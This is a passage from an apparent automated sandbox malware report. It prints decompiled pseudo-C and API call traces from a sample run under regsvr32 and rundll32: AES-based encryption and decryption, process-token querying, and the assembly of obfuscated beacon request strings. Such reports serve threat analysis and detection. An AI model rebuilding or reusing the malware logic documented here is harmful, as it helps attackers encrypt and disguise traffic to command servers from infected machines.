                    • lstrlen.KERNEL32(05AC9B50,00000000,00000000,7691C740,04F96AE6,00000000), ref: 04F9253A
                    • lstrlen.KERNEL32(?), ref: 04F92542
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • lstrcpy.KERNEL32(00000000,05AC9B50), ref: 04F92556
                    • lstrcat.KERNEL32(00000000,?), ref: 04F92561
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                    • String ID:
                    • API String ID: 74227042-0
                    • Opcode ID: 3eaed05a9ccc4b0981076980f64e42b3cb3a8e00da4f2cf74e8ad08e08d4b5aa
                    • Instruction ID: 60019a3df89eb4b47f9a9b3fa1deb3dcc9e9fb896db9201474247a28021ea267
                    • Opcode Fuzzy Hash: 3eaed05a9ccc4b0981076980f64e42b3cb3a8e00da4f2cf74e8ad08e08d4b5aa
                    • Instruction Fuzzy Hash: B1E09273901264779B119BF9BC48CAFBBACFF89610709041AFA10D3210CB699C12CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 135 4214872-42148b2 CryptAcquireContextW 136 4214a09-4214a0f GetLastError 135->136 137 42148b8-42148f4 memcpy CryptImportKey 135->137 138 4214a12-4214a19 136->138 139 42149f4-42149fa GetLastError 137->139 140 42148fa-421490c CryptSetKeyParam 137->140 141 42149fd-4214a07 CryptReleaseContext 139->141 142 42149e0-42149e6 GetLastError 140->142 143 4214912-421491b 140->143 141->138 146 42149e9-42149f2 CryptDestroyKey 142->146 144 4214923-4214930 call 42163fd 143->144 145 421491d-421491f 143->145 150 42149d7-42149de 144->150 151 4214936-421493f 144->151 145->144 147 4214921 145->147 146->141 147->144 150->146 152 4214942-421494a 151->152 153 421494c 152->153 154 421494f-421496c memcpy 152->154 153->154 155 4214987-4214996 CryptDecrypt 154->155 156 421496e-4214985 CryptEncrypt 154->156 157 421499c-421499e 155->157 156->157 158 42149a0-42149aa 157->158 159 42149ae-42149b9 GetLastError 157->159 158->152 160 42149ac 158->160 161 42149bb-42149cb 159->161 162 42149cd-42149d5 call 42117ab 159->162 160->161 161->146 162->146
                    C-Code - Quality: 58%
                    			E04214872(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                    				int _v8;
                    				long* _v12;
                    				int _v16;
                    				BYTE* _v20;
                    				long* _v24;
                    				void* _v39;
                    				char _v40;
                    				void _v56;
                    				int _v60;
                    				intOrPtr _v64;
                    				void _v67;
                    				char _v68;
                    				void* _t61;
                    				int _t68;
                    				signed int _t76;
                    				int _t79;
                    				int _t81;
                    				int _t85;
                    				long _t86;
                    				int _t90;
                    				signed int _t94;
                    				int _t101;
                    				BYTE* _t102;
                    				int _t103;
                    				void* _t104;
                    				void* _t105;
                    				void* _t106;
                    
                    				_t103 = __eax;
                    				_t94 = 6;
                    				_v68 = 0;
                    				memset( &_v67, 0, _t94 << 2);
                    				_t105 = _t104 + 0xc;
                    				asm("stosw");
                    				asm("stosb");
                    				_v40 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosw");
                    				asm("stosb");
                    				_t61 =  *0x421a0e4( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                    				if(_t61 == 0) {
                    					_a8 = GetLastError();
                    				} else {
                    					_t101 = 0x10;
                    					memcpy( &_v56, _a8, _t101);
                    					_t106 = _t105 + 0xc;
                    					_v60 = _t101;
                    					_v67 = 2;
                    					_v64 = 0x660e;
                    					_v68 = 8;
                    					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                    					if(_t68 == 0) {
                    						_a8 = GetLastError();
                    					} else {
                    						_push(0);
                    						_push( &_v40);
                    						_push(1);
                    						_push(_v12);
                    						if( *0x421a0c4() == 0) {
                    							_a8 = GetLastError();
                    						} else {
                    							_t18 = _t103 + 0xf; // 0x11f
                    							_t76 = _t18 & 0xfffffff0;
                    							if(_a4 != 0 && _t76 == _t103) {
                    								_t76 = _t76 + _t101;
                    							}
                    							_t102 = E042163FD(_t76);
                    							_v20 = _t102;
                    							if(_t102 == 0) {
                    								_a8 = 8;
                    							} else {
                    								_v16 = 0;
                    								_a8 = 0;
                    								while(1) {
                    									_t79 = 0x10;
                    									_v8 = _t79;
                    									if(_t103 <= _t79) {
                    										_v8 = _t103;
                    									}
                    									memcpy(_t102, _a12, _v8);
                    									_t81 = _v8;
                    									_a12 = _a12 + _t81;
                    									_t103 = _t103 - _t81;
                    									_t106 = _t106 + 0xc;
                    									if(_a4 == 0) {
                    										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                    									} else {
                    										_t85 =  *0x421a0c8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                    									}
                    									if(_t85 == 0) {
                    										break;
                    									}
                    									_t90 = _v8;
                    									_v16 = _v16 + _t90;
                    									_t102 =  &(_t102[_t90]);
                    									if(_t103 != 0) {
                    										continue;
                    									} else {
                    										L17:
                    										 *_a16 = _v20;
                    										 *_a20 = _v16;
                    									}
                    									goto L21;
                    								}
                    								_t86 = GetLastError();
                    								_a8 = _t86;
                    								if(_t86 != 0) {
                    									E042117AB(_v20);
                    								} else {
                    									goto L17;
                    								}
                    							}
                    						}
                    						L21:
                    						CryptDestroyKey(_v12);
                    					}
                    					CryptReleaseContext(_v24, 0);
                    				}
                    				return _a8;
                    			}































                    APIs
                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04213AC6), ref: 042148AA
                    • memcpy.NTDLL(?,04213AC6,00000010,?,?,?,?,?,?,?,?,?,?,042160F5,00000000,04214DD9), ref: 042148C3
                    • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 042148EC
                    • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04214904
                    • memcpy.NTDLL(00000000,04214DD9,04213AC6,0000011F), ref: 04214956
                    • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04213AC6,00000020,?,?,0000011F), ref: 0421497F
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04213AC6,?,?,0000011F), ref: 04214996
                    • GetLastError.KERNEL32(?,?,0000011F), ref: 042149AE
                    • GetLastError.KERNEL32 ref: 042149E0
                    • CryptDestroyKey.ADVAPI32(?), ref: 042149EC
                    • GetLastError.KERNEL32 ref: 042149F4
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04214A01
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,042160F5,00000000,04214DD9,04213AC6,?,04213AC6), ref: 04214A09
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                    • String ID:
                    • API String ID: 1967744295-0
                    • Opcode ID: 794f83e66b8f36519a683b37d9085566b452abd95adb9d10a8cb0b8f09d1b230
                    • Instruction ID: 26a2912d317cffc633b0689d9bfc5a1ed031e24a928f741e4dbf9884e229f1a3
                    • Opcode Fuzzy Hash: 794f83e66b8f36519a683b37d9085566b452abd95adb9d10a8cb0b8f09d1b230
                    • Instruction Fuzzy Hash: 5A516CB1A10209FFDF10EFA8DC88AAEBBF8EB14350F104465F919E6160D774AE54DB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 38%
                    			E042177BB(char _a4, void* _a8) {
                    				void* _v8;
                    				void* _v12;
                    				char _v16;
                    				void* _v20;
                    				char _v24;
                    				char _v28;
                    				char _v32;
                    				char _v36;
                    				char _v40;
                    				void* _v44;
                    				void** _t33;
                    				void* _t40;
                    				void* _t43;
                    				void** _t44;
                    				intOrPtr* _t47;
                    				char _t48;
                    
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v20 = _a4;
                    				_t48 = 0;
                    				_v16 = 0;
                    				_a4 = 0;
                    				_v44 = 0x18;
                    				_v40 = 0;
                    				_v32 = 0;
                    				_v36 = 0;
                    				_v28 = 0;
                    				_v24 = 0;
                    				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                    					_t33 =  &_v8;
                    					__imp__(_v12, 8, _t33);
                    					if(_t33 >= 0) {
                    						_t47 = __imp__;
                    						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                    						_t44 = E042163FD(_a4);
                    						if(_t44 != 0) {
                    							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                    							if(_t40 >= 0) {
                    								memcpy(_a8,  *_t44, 0x1c);
                    								_t48 = 1;
                    							}
                    							E042117AB(_t44);
                    						}
                    						NtClose(_v8); // executed
                    					}
                    					NtClose(_v12);
                    				}
                    				return _t48;
                    			}

                    APIs
                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04217802
                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04217815
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04217831
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0421784E
                    • memcpy.NTDLL(?,00000000,0000001C), ref: 0421785B
                    • NtClose.NTDLL(?), ref: 0421786D
                    • NtClose.NTDLL(00000000), ref: 04217877
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 2575439697-0
                    • Opcode ID: df768afc3d39f89a76af13bef60a1143c0cdea1ee9dddbc670b24fd9ee3042f1
                    • Instruction ID: 28704f22f91a8061aa6ac02bb2816905eb6b28e250eaad31167f55c5fcdc210e
                    • Opcode Fuzzy Hash: df768afc3d39f89a76af13bef60a1143c0cdea1ee9dddbc670b24fd9ee3042f1
                    • Instruction Fuzzy Hash: E72116B2A10218BBDF01DF99DC88ADEBFBDEF58740F104062F905A6160D7719B84DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 68%
                    			E042168EB(long __eax, void* __edx, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
                    				intOrPtr _v0;
                    				intOrPtr _v4;
                    				void* _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v52;
                    				void* __ecx;
                    				void* __edi;
                    				long _t29;
                    				intOrPtr _t30;
                    				intOrPtr _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr _t34;
                    				void* _t37;
                    				intOrPtr _t38;
                    				int _t41;
                    				void* _t42;
                    				intOrPtr _t46;
                    				intOrPtr _t47;
                    				intOrPtr _t54;
                    				intOrPtr _t58;
                    				intOrPtr* _t60;
                    				void* _t61;
                    				intOrPtr _t66;
                    				intOrPtr _t72;
                    				intOrPtr _t75;
                    				intOrPtr _t78;
                    				int _t81;
                    				intOrPtr _t82;
                    				int _t85;
                    				intOrPtr _t87;
                    				int _t90;
                    				intOrPtr _t92;
                    				int _t95;
                    				intOrPtr* _t97;
                    				intOrPtr* _t98;
                    				void* _t99;
                    				void* _t103;
                    				void* _t104;
                    				void* _t105;
                    				intOrPtr _t106;
                    				void* _t108;
                    				int _t109;
                    				void* _t110;
                    				void* _t111;
                    				void* _t113;
                    				void* _t114;
                    				void* _t116;
                    
                    				_t103 = __edx;
                    				_t29 = __eax;
                    				_t113 = _a20;
                    				_v4 = 8;
                    				if(__eax == 0) {
                    					_t29 = GetTickCount();
                    				}
                    				_t30 =  *0x421a018; // 0x3639fe1b
                    				asm("bswap eax");
                    				_t31 =  *0x421a014; // 0x3a87c8cd
                    				asm("bswap eax");
                    				_t32 =  *0x421a010; // 0xd8d2f808
                    				asm("bswap eax");
                    				_t33 =  *0x421a00c; // 0xeec43f25
                    				asm("bswap eax");
                    				_t34 =  *0x421a320; // 0x87d5a8
                    				_t3 = _t34 + 0x421b633; // 0x74666f73
                    				_t109 = wsprintfA(_t113, _t3, 2, 0x3d170, _t33, _t32, _t31, _t30,  *0x421a02c,  *0x421a004, _t29);
                    				_t37 = E04214B2C();
                    				_t38 =  *0x421a320; // 0x87d5a8
                    				_t4 = _t38 + 0x421b673; // 0x74707526
                    				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
                    				_t116 = _t114 + 0x38;
                    				_t110 = _t109 + _t41;
                    				if(_a24 != 0) {
                    					_t92 =  *0x421a320; // 0x87d5a8
                    					_t8 = _t92 + 0x421b67e; // 0x732526
                    					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t95; // executed
                    				}
                    				_t42 = E0421256F(_t99); // executed
                    				_t104 = _t42;
                    				if(_t104 != 0) {
                    					_t87 =  *0x421a320; // 0x87d5a8
                    					_t10 = _t87 + 0x421b8d4; // 0x736e6426
                    					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t90;
                    					HeapFree( *0x421a2d8, 0, _t104);
                    				}
                    				_t105 = E04214B71();
                    				if(_t105 != 0) {
                    					_t82 =  *0x421a320; // 0x87d5a8
                    					_t12 = _t82 + 0x421b8dc; // 0x6f687726
                    					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t85;
                    					HeapFree( *0x421a2d8, 0, _t105);
                    				}
                    				_t106 =  *0x421a3cc; // 0x4a995b0
                    				_a24 = E04217729(0x421a00a, _t106 + 4);
                    				_t46 =  *0x421a36c; // 0x0
                    				if(_t46 != 0) {
                    					_t78 =  *0x421a320; // 0x87d5a8
                    					_t15 = _t78 + 0x421b8b6; // 0x3d736f26
                    					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t81;
                    				}
                    				_t47 =  *0x421a368; // 0x0
                    				if(_t47 != 0) {
                    					_t75 =  *0x421a320; // 0x87d5a8
                    					_t17 = _t75 + 0x421b88d; // 0x3d706926
                    					wsprintfA(_t110 + _t113, _t17, _t47);
                    				}
                    				if(_a24 != 0) {
                    					_t108 = RtlAllocateHeap( *0x421a2d8, 0, 0x800);
                    					if(_t108 != 0) {
                    						E042153EC(GetTickCount());
                    						_t54 =  *0x421a3cc; // 0x4a995b0
                    						__imp__(_t54 + 0x40);
                    						asm("lock xadd [eax], ecx");
                    						_t58 =  *0x421a3cc; // 0x4a995b0
                    						__imp__(_t58 + 0x40);
                    						_t60 =  *0x421a3cc; // 0x4a995b0
                    						_t61 = E042118BA(1, _t103, _t113,  *_t60); // executed
                    						_t111 = _t61;
                    						asm("lock xadd [eax], ecx");
                    						if(_t111 != 0) {
                    							StrTrimA(_t111, 0x421928c);
                    							_push(_t111);
                    							_t66 = E0421252A();
                    							_a12 = _t66;
                    							if(_t66 != 0) {
                    								_t97 = __imp__;
                    								 *_t97(_t111, _v0);
                    								 *_t97(_t108, _v4);
                    								_t98 = __imp__;
                    								 *_t98(_t108, _v0);
                    								 *_t98(_t108, _t111);
                    								_t72 = E04211AA2(0xffffffffffffffff, _t108, _v24, _v20); // executed
                    								_v52 = _t72;
                    								if(_t72 != 0 && _t72 != 0x10d2) {
                    									E04215F6A();
                    								}
                    								HeapFree( *0x421a2d8, 0, _v16);
                    							}
                    							HeapFree( *0x421a2d8, 0, _t111);
                    						}
                    						RtlFreeHeap( *0x421a2d8, 0, _t108); // executed
                    					}
                    					HeapFree( *0x421a2d8, 0, _a16);
                    				}
                    				HeapFree( *0x421a2d8, 0, _t113);
                    				return _a12;
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 04216901
                    • wsprintfA.USER32 ref: 0421694E
                    • wsprintfA.USER32 ref: 0421696B
                    • wsprintfA.USER32 ref: 0421698D
                    • wsprintfA.USER32 ref: 042169B0
                    • HeapFree.KERNEL32(00000000,00000000), ref: 042169C0
                    • wsprintfA.USER32 ref: 042169E2
                    • HeapFree.KERNEL32(00000000,00000000), ref: 042169F2
                    • wsprintfA.USER32 ref: 04216A29
                    • wsprintfA.USER32 ref: 04216A49
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04216A66
                    • GetTickCount.KERNEL32 ref: 04216A76
                    • RtlEnterCriticalSection.NTDLL(04A99570), ref: 04216A8A
                    • RtlLeaveCriticalSection.NTDLL(04A99570), ref: 04216AA8
                      • Part of subcall function 042118BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04216ABB,?,04A995B0), ref: 042118E5
                      • Part of subcall function 042118BA: lstrlen.KERNEL32(?,?,?,04216ABB,?,04A995B0), ref: 042118ED
                      • Part of subcall function 042118BA: strcpy.NTDLL ref: 04211904
                      • Part of subcall function 042118BA: lstrcat.KERNEL32(00000000,?), ref: 0421190F
                      • Part of subcall function 042118BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04216ABB,?,04A995B0), ref: 0421192C
                    • StrTrimA.SHLWAPI(00000000,0421928C,?,04A995B0), ref: 04216ADA
                      • Part of subcall function 0421252A: lstrlen.KERNEL32(04A99B50,00000000,00000000,7691C740,04216AE6,00000000), ref: 0421253A
                      • Part of subcall function 0421252A: lstrlen.KERNEL32(?), ref: 04212542
                      • Part of subcall function 0421252A: lstrcpy.KERNEL32(00000000,04A99B50), ref: 04212556
                      • Part of subcall function 0421252A: lstrcat.KERNEL32(00000000,?), ref: 04212561
                    • lstrcpy.KERNEL32(00000000,?), ref: 04216AF9
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04216B00
                    • lstrcat.KERNEL32(00000000,?), ref: 04216B0D
                    • lstrcat.KERNEL32(00000000,00000000), ref: 04216B11
                      • Part of subcall function 04211AA2: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 04211B54
                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04216B41
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04216B50
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,04A995B0), ref: 04216B5F
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04216B71
                    • HeapFree.KERNEL32(00000000,?), ref: 04216B80
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                    • String ID: Ut
                    • API String ID: 1892477351-8415677
                    • Opcode ID: 53c58bb972c31d31722fd6fb5d827a4c17de972f7764def7ea3c4e9b105f0bcf
                    • Instruction ID: 8510f8e058640d606d19402dab593d130557cd11b1ad602879e70f34f0713ac6
                    • Opcode Fuzzy Hash: 53c58bb972c31d31722fd6fb5d827a4c17de972f7764def7ea3c4e9b105f0bcf
                    • Instruction Fuzzy Hash: D9718871701205AFD7129B68FC88F6A7BE8EB68754F090126F909D3270DE39ED45CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 75%
                    			E04212FC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
                    				signed int _v8;
                    				void* _v12;
                    				void* _v16;
                    				void* _v20;
                    				void* _v24;
                    				void* __ebx;
                    				void* __edi;
                    				long _t63;
                    				intOrPtr _t64;
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				intOrPtr _t67;
                    				intOrPtr _t68;
                    				void* _t71;
                    				intOrPtr _t72;
                    				int _t75;
                    				void* _t76;
                    				void* _t77;
                    				void* _t79;
                    				void* _t82;
                    				intOrPtr _t86;
                    				intOrPtr _t90;
                    				intOrPtr* _t92;
                    				void* _t93;
                    				void* _t98;
                    				intOrPtr _t104;
                    				signed int _t108;
                    				char** _t110;
                    				int _t113;
                    				signed int _t115;
                    				intOrPtr* _t116;
                    				intOrPtr* _t118;
                    				intOrPtr* _t120;
                    				intOrPtr* _t122;
                    				intOrPtr _t125;
                    				intOrPtr _t130;
                    				int _t134;
                    				intOrPtr _t136;
                    				int _t139;
                    				CHAR* _t140;
                    				intOrPtr _t141;
                    				void* _t142;
                    				void* _t151;
                    				int _t152;
                    				void* _t153;
                    				intOrPtr _t154;
                    				void* _t156;
                    				long _t160;
                    				intOrPtr* _t161;
                    				intOrPtr* _t162;
                    				intOrPtr* _t165;
                    				void* _t166;
                    				void* _t168;
                    
                    				_t151 = __edx;
                    				_t142 = __ecx;
                    				_t63 = __eax;
                    				_v8 = 8;
                    				if(__eax == 0) {
                    					_t63 = GetTickCount();
                    				}
                    				_t64 =  *0x421a018; // 0x3639fe1b
                    				asm("bswap eax");
                    				_t65 =  *0x421a014; // 0x3a87c8cd
                    				_t140 = _a20;
                    				asm("bswap eax");
                    				_t66 =  *0x421a010; // 0xd8d2f808
                    				asm("bswap eax");
                    				_t67 =  *0x421a00c; // 0xeec43f25
                    				asm("bswap eax");
                    				_t68 =  *0x421a320; // 0x87d5a8
                    				_t3 = _t68 + 0x421b633; // 0x74666f73
                    				_t152 = wsprintfA(_t140, _t3, 3, 0x3d170, _t67, _t66, _t65, _t64,  *0x421a02c,  *0x421a004, _t63);
                    				_t71 = E04214B2C();
                    				_t72 =  *0x421a320; // 0x87d5a8
                    				_t4 = _t72 + 0x421b673; // 0x74707526
                    				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
                    				_t168 = _t166 + 0x38;
                    				_t153 = _t152 + _t75;
                    				if(_a8 != 0) {
                    					_t136 =  *0x421a320; // 0x87d5a8
                    					_t8 = _t136 + 0x421b67e; // 0x732526
                    					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
                    					_t168 = _t168 + 0xc;
                    					_t153 = _t153 + _t139; // executed
                    				}
                    				_t76 = E0421256F(_t142); // executed
                    				_t141 = __imp__; // 0x74e05520
                    				_a8 = _t76;
                    				if(_t76 != 0) {
                    					_t130 =  *0x421a320; // 0x87d5a8
                    					_t11 = _t130 + 0x421b8d4; // 0x736e6426
                    					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
                    					_t168 = _t168 + 0xc;
                    					_t153 = _t153 + _t134;
                    					HeapFree( *0x421a2d8, 0, _a8);
                    				}
                    				_t77 = E04214B71();
                    				_a8 = _t77;
                    				if(_t77 != 0) {
                    					_t125 =  *0x421a320; // 0x87d5a8
                    					_t15 = _t125 + 0x421b8dc; // 0x6f687726
                    					wsprintfA(_t153 + _a20, _t15, _t77);
                    					_t168 = _t168 + 0xc;
                    					HeapFree( *0x421a2d8, 0, _a8);
                    				}
                    				_t154 =  *0x421a3cc; // 0x4a995b0
                    				_t79 = E04217729(0x421a00a, _t154 + 4);
                    				_t160 = 0;
                    				_v16 = _t79;
                    				if(_t79 == 0) {
                    					L28:
                    					RtlFreeHeap( *0x421a2d8, _t160, _a20); // executed
                    					return _v8;
                    				} else {
                    					_t82 = RtlAllocateHeap( *0x421a2d8, 0, 0x800); // executed
                    					_a8 = _t82;
                    					if(_t82 == 0) {
                    						L27:
                    						HeapFree( *0x421a2d8, _t160, _v16);
                    						goto L28;
                    					}
                    					E042153EC(GetTickCount());
                    					_t86 =  *0x421a3cc; // 0x4a995b0
                    					__imp__(_t86 + 0x40);
                    					asm("lock xadd [eax], ecx");
                    					_t90 =  *0x421a3cc; // 0x4a995b0
                    					__imp__(_t90 + 0x40);
                    					_t92 =  *0x421a3cc; // 0x4a995b0
                    					_t93 = E042118BA(1, _t151, _a20,  *_t92); // executed
                    					_t156 = _t93;
                    					_v24 = _t156;
                    					asm("lock xadd [eax], ecx");
                    					if(_t156 == 0) {
                    						L26:
                    						RtlFreeHeap( *0x421a2d8, _t160, _a8); // executed
                    						goto L27;
                    					}
                    					StrTrimA(_t156, 0x421928c);
                    					_push(_t156);
                    					_t98 = E0421252A();
                    					_v12 = _t98;
                    					if(_t98 == 0) {
                    						L25:
                    						HeapFree( *0x421a2d8, _t160, _t156);
                    						goto L26;
                    					}
                    					_t161 = __imp__;
                    					 *_t161(_t156, _a4);
                    					 *_t161(_a8, _v16);
                    					_t162 = __imp__;
                    					 *_t162(_a8, _v12);
                    					_t104 = E04215406( *_t162(_a8, _t156), _a8);
                    					_a4 = _t104;
                    					if(_t104 == 0) {
                    						_v8 = 8;
                    						L23:
                    						E04215F6A();
                    						L24:
                    						HeapFree( *0x421a2d8, 0, _v12);
                    						_t160 = 0;
                    						goto L25;
                    					}
                    					_t108 = E042122C7(_t141, 0xffffffffffffffff, _t156,  &_v20); // executed
                    					_v8 = _t108;
                    					if(_t108 == 0) {
                    						_t165 = _v20;
                    						_t115 = E04211E51(_t165, _a4, _a12, _a16); // executed
                    						_v8 = _t115;
                    						_t116 =  *((intOrPtr*)(_t165 + 8));
                    						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                    						_t118 =  *((intOrPtr*)(_t165 + 8));
                    						 *((intOrPtr*)( *_t118 + 8))(_t118);
                    						_t120 =  *((intOrPtr*)(_t165 + 4));
                    						 *((intOrPtr*)( *_t120 + 8))(_t120);
                    						_t122 =  *_t165;
                    						 *((intOrPtr*)( *_t122 + 8))(_t122);
                    						E042117AB(_t165);
                    					}
                    					if(_v8 != 0x10d2) {
                    						L18:
                    						if(_v8 == 0) {
                    							_t110 = _a12;
                    							if(_t110 != 0) {
                    								_t157 =  *_t110;
                    								_t163 =  *_a16;
                    								wcstombs( *_t110,  *_t110,  *_a16);
                    								_t113 = E04215D6F(_t157, _t157, _t163 >> 1);
                    								_t156 = _v24;
                    								 *_a16 = _t113;
                    							}
                    						}
                    						goto L21;
                    					} else {
                    						if(_a12 != 0) {
                    							L21:
                    							E042117AB(_a4);
                    							if(_v8 == 0 || _v8 == 0x10d2) {
                    								goto L24;
                    							} else {
                    								goto L23;
                    							}
                    						}
                    						_v8 = _v8 & 0x00000000;
                    						goto L18;
                    					}
                    				}
                    			}


                    APIs
                    • GetTickCount.KERNEL32 ref: 04212FD8
                    • wsprintfA.USER32 ref: 04213028
                    • wsprintfA.USER32 ref: 04213045
                    • wsprintfA.USER32 ref: 04213065
                    • wsprintfA.USER32 ref: 04213091
                    • HeapFree.KERNEL32(00000000,00000000), ref: 042130A3
                    • wsprintfA.USER32 ref: 042130C4
                    • HeapFree.KERNEL32(00000000,00000000), ref: 042130D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04213102
                    • GetTickCount.KERNEL32 ref: 04213113
                    • RtlEnterCriticalSection.NTDLL(04A99570), ref: 04213127
                    • RtlLeaveCriticalSection.NTDLL(04A99570), ref: 04213145
                      • Part of subcall function 042118BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04216ABB,?,04A995B0), ref: 042118E5
                      • Part of subcall function 042118BA: lstrlen.KERNEL32(?,?,?,04216ABB,?,04A995B0), ref: 042118ED
                      • Part of subcall function 042118BA: strcpy.NTDLL ref: 04211904
                      • Part of subcall function 042118BA: lstrcat.KERNEL32(00000000,?), ref: 0421190F
                      • Part of subcall function 042118BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04216ABB,?,04A995B0), ref: 0421192C
                    • StrTrimA.SHLWAPI(00000000,0421928C,?,04A995B0), ref: 0421317C
                      • Part of subcall function 0421252A: lstrlen.KERNEL32(04A99B50,00000000,00000000,7691C740,04216AE6,00000000), ref: 0421253A
